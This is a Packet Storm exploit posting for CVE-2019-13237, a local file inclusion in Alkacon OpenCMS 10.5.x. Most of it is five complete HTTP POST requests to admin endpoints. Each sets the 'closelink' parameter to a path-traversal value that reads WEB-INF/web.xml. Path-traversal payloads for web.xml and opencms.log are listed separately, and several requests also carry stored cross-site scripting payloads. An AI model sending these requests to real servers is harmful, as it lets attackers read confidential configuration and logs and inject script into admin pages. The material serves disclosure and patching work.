what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Alkacon OpenCMS 10.5.x Local File Inclusion

Alkacon OpenCMS 10.5.x Local File Inclusion
Posted Sep 2, 2019
Authored by Aetsu

Alkacon OpenCMS version 10.5.x suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
advisories | CVE-2019-13237
SHA-256 | b33c2d578f76f0e4b2a41abce773622612359c6f7f9ff16897dcd7eb9b9f132b

Alkacon OpenCMS 10.5.x Local File Inclusion

Change Mirror Download
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13237

For the tests, I used the payloads:
```
…%2f…%2fWEB-INF%2flogs%2fopencms.log
…%2f…%2fWEB-INF%2fweb.xml
```

1. Affected resource closelink:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
2. Affected resource closelink:
POC:
```
POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp
HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
```
3. Affected resource closelink:
POC:
```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
4. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
Host: example.com
versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
```
5. Affected resource closelink:
POC:
```
POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
Host: example.com
reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
```


Extended POCs: https://aetsu.github.io/OpenCms
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close